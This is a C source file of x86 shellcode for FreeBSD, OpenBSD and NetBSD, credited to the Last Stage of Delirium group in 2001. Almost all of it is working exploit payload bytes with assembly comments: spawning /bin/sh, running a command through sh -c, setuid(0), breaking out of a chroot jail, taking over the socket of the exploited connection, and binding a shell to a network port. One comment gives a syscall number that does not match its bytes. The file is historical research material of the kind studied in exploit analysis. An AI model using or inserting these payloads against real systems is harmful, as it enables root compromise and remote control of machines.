/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for freebsd 3.4 openbsd 2.8 netbsd 1.5 x86                     #*/

/*
syscall     %eax stack 
----------- ---- ---------------------------------------------------------------
execve      x03b ret,->path="/bin//sh",->[->a0=0],0
execve      x03b ret,->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
setuid      x017 ret,uid=0
mkdir       x088 ret,->path="b..",mode= (each value is valid)
chroot      x03d ret,->path={"b..","."}
chdir       x00c ret,->path=".."
getpeername x01f ret,sfd,->sadr=[],->[len=0x10]
socket      x061 ret,AF_INET=2,SOCK_STREAM=1,prot=0
bind        x068 ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],->[0x10]
listen      x06a ret,sfd,backlog=5
accept      x01e ret,sfd,0,0
dup2        x05a ret,sfd,fd={0,1,2}
*/

#if defined(X86) && ( defined(OPENBSD) || defined(FREEBSD) || defined(NETBSD) )

char shellcode[]=          /* 23 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x54"                 /* pushl   %esp                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

char cmdshellcode[]=       /* 44+cmdlen bytes                */
    "\xeb\x25"             /* jmp     <cmdshellcode+39>      */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x3b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */ 
    "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */
    /* command */
;

char setuidcode[]=         /* 7 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
;
 
char chrootcode[]=         /* 44 bytes                       */
    "\x68""b..."           /* pushl   $0x2e2e2e62            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x88\x47\x03"         /* movb    %al,0x3(%edi)          */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x88"             /* movb    $0x88,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x47"                 /* incl    %edi                   */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x0c"             /* movb    $0x0c,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xfa"             /* loop    <chrootcode+31>        */
    "\x47"                 /* incl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
;

char findsckcode[]=        /* 59 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x10"             /* movb    $0x10,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x57"                 /* pushl   %edi                   */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */ 
    "\x51"                 /* pushl   %ecx                   */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x1f"             /* movb    $0x1f,%al              */
    "\x51"                 /* pushl   %ecx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x59"                 /* popl    %ecx                   */
    "\x59"                 /* popl    %ecx                   */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+40>       */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx            */
    "\x66\x39\x5f\x02"     /* cmpw    %bx,0x2(%edi)          */
    "\x74\x02"             /* je      <findsckcode+42>       */
    "\xe2\xe4"             /* loop    <findsckcode+14>       */
    "\x51"                 /* pushl   %ecx                   */
    "\x50"                 /* pushl   %eax                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */ 
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x5a"             /* movb    $0x5a,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xf4"             /* loop    <findsckcode+47>       */
;

char bindsckcode[]=        /* 70 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x6a\x01"             /* pushl   $0x01                  */
    "\x6a\x02"             /* pushl   $0x02                  */
    "\xb0\x61"             /* movb    $0x61,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x89\x47\x04"         /* movl    %eax,0x4(%edi)         */
    "\x6a\x10"             /* pushb   $0x10                  */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x68"             /* movb    $0x68,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x6a\x05"             /* pushb   $0x05                  */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x6a"             /* movb    $0x6a,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x1e"             /* movb    $0x1e,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */ 
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x5a"             /* movb    $0x5a,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xf4"             /* loop    <bindsckcode+58>       */
;

char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

#define FINDSCKPORTOFS     32
#define BINDSCKPORTOFS     05
#define BSD

#endif
